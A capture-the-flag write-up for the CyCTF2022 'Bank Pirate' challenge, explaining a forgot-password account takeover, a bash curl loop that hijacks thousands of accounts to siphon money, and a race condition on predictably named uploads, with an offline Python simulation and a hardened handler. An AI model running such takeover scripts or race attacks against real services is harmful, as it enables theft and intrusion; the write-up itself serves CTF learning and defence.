
The Bank Pirate - CyCTF2022

Summary :

It is a banking application: you can receive and transfer money with your account, and to get VIP access you need a balance of $1,000,000.

Methodology :

The first thing that came to mind was that I needed to steal money to reach VIP. The transfer_money function takes two parameters, the amount and the receiver account; we cannot manipulate the sender ID to move money out of someone else's account into ours, because the sender ID is read from the session rather than from the request. Forgot Password flows are a common source of account takeover in web applications, so I went to check how that function works here. After analyzing it I found that we can take over any account: the function asks for a username and then hands you that user's session without first verifying that you are that user.

So now I will try to take over user 2 and transfer money to my account. I successfully took over the account and transferred money to mine. Now I need to automate this to reach one million dollars. The script below takes over accounts sequentially and, from each hijacked session, transfers money to my account (receiver_account=6015).

```bash
#!/bin/bash
# One attacker session is reused throughout: forgot-password.php switches that
# session to the requested user, so the transfer that follows runs as that user.
TARGET='http://3.248.33.115:40017'
SESSION='PHPSESSID=htr5dtksu0fp2i5121sfblfnod'
MY_ACCOUNT=6015

for i in $(seq 7 6000); do
  # Take over account $i (the app never checks that we own it)
  curl -s -k -b "$SESSION" \
    "$TARGET/forgot-password.php?username=$i"
  # Transfer 1000 from the hijacked account to ours
  curl -s -k -b "$SESSION" \
    "$TARGET/transfere.php?receiver_account=$MY_ACCOUNT&amount=1000"
done
```

After waiting a while, I had a VIP account. Now we can upload a file with a complaint, because we are VIP and they have to listen.

Let's analyze how the complaint function works and see how we can abuse the upload. We can only upload PNG and JPEG files, and the location of the uploaded file is generated by the syper_random function. Let's see how random that really is. Yeah, it's "super random" (it is not: the name is predictable, which is what the rest of the attack depends on).

(Screenshot: the uploaded image is served back as b6589fc6ab0dc82cf12099d1c2d40ab994e8410c.png, a 900x876-pixel PNG. That name is the SHA-1 of the string "0", so anyone can compute where the next upload will land.)

The last part of the challenge is similar to the RACE-CONDITION challenge; as you can see, the same steps make it vulnerable. After a file is uploaded it is written to disk temporarily, so we can use a race condition to request the uploaded file, at its predictable path, while it is still on disk, get it executed and read the flag.
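To make the race concrete, here is an added example of mine (not the challenge's source, which the post does not show) that simulates the flow described above offline: the file lands on disk under a predictable name before validation finishes, and a second thread polls that name. It assumes the name scheme is sha1 of a fixed value plus ".png" (the upload in this writeup was served as b6589fc6ab0dc82cf12099d1c2d40ab994e8410c.png, which is sha1("0"); the real syper_random is not shown), that validation is a magic-bytes check that runs after the write, and a made-up payload. A hardened handler is shown beside the vulnerable one. Against the real target the poller would GET the predicted URL instead of reading the disk.

```python
"""Added example (not the challenge's code): simulate the upload race offline."""
import hashlib
import os
import tempfile
import threading
import time

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def predicted_name(seed):
    """Assumed name scheme: sha1 of a fixed value plus ".png".

    The writeup's upload was served as b6589fc6ab0dc82cf12099d1c2d40ab994e8410c.png,
    which is sha1("0"); the real syper_random function is not shown, so this is a guess.
    """
    return hashlib.sha1(str(seed).encode()).hexdigest() + ".png"


class UploadServer:
    """Constructed stand-in for the complaint upload handler."""

    def __init__(self, webroot, quarantine, window=0.01):
        self.webroot = webroot          # files here are reachable over HTTP
        self.quarantine = quarantine    # files here are not
        self.window = window            # how long validation takes (the TOCTOU window)

    def upload_vulnerable(self, seed, data):
        # Bug: write into the web root first, validate afterwards.
        path = os.path.join(self.webroot, predicted_name(seed))
        with open(path, "wb") as f:
            f.write(data)
        time.sleep(self.window)              # validation still running...
        if not data.startswith(PNG_MAGIC):   # ...and only now rejects the file
            os.unlink(path)
            return False
        return True

    def upload_fixed(self, seed, data):
        # Fix: validate first, stage outside the web root, then move atomically.
        if not data.startswith(PNG_MAGIC):
            return False
        fd, tmp = tempfile.mkstemp(dir=self.quarantine)
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        os.replace(tmp, os.path.join(self.webroot, predicted_name(seed)))
        return True

    def fetch(self, name):
        """What a GET for /uploads/<name> would return (bytes, or None for 404)."""
        try:
            with open(os.path.join(self.webroot, name), "rb") as f:
                return f.read()
        except OSError:
            return None


def race_upload(upload, fetch, name, payload, attempts=50):
    """Upload `payload` repeatedly while a second thread polls the predicted path.

    Returns the body served during the window, or None if the race was never won.
    """
    hits = []
    stop = threading.Event()

    def poll():
        while not stop.is_set():
            body = fetch(name)
            if body:                     # empty read = file created but not yet written
                hits.append(body)
                stop.set()
            else:
                time.sleep(0.0005)

    poller = threading.Thread(target=poll)
    poller.start()
    for _ in range(attempts):
        if stop.is_set():
            break
        upload(payload)
    stop.set()
    poller.join()
    return hits[0] if hits else None


def run_demo(payload=b"<?php echo 'race won'; ?>"):
    """Race the vulnerable and the fixed handler; the payload is made up."""
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "uploads")
        quarantine = os.path.join(root, "quarantine")
        os.mkdir(webroot)
        os.mkdir(quarantine)
        srv = UploadServer(webroot, quarantine)
        name = predicted_name(0)

        srv.upload_vulnerable(0, payload)      # one upload, then a fetch afterwards:
        after_upload = srv.fetch(name)         # None, the file is already gone
        vulnerable = race_upload(lambda d: srv.upload_vulnerable(0, d), srv.fetch, name, payload)
        fixed = race_upload(lambda d: srv.upload_fixed(0, d), srv.fetch, name, payload)
    return {"after_upload": after_upload, "vulnerable_race": vulnerable, "fixed_race": fixed}


if __name__ == "__main__":
    print(run_demo())
```

A sequential upload-then-fetch never sees the rejected file, which is why the check looks safe in normal testing; only the concurrent poller catches it inside the window. The hardened handler closes the window by ordering the steps correctly and by never placing unvalidated bytes under the web root, but a magic-bytes check alone still lets a valid PNG with trailing PHP through, so uploads must also be served from a location that the web server will not execute.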

This post is licensed under CC BY 4.0 by the author.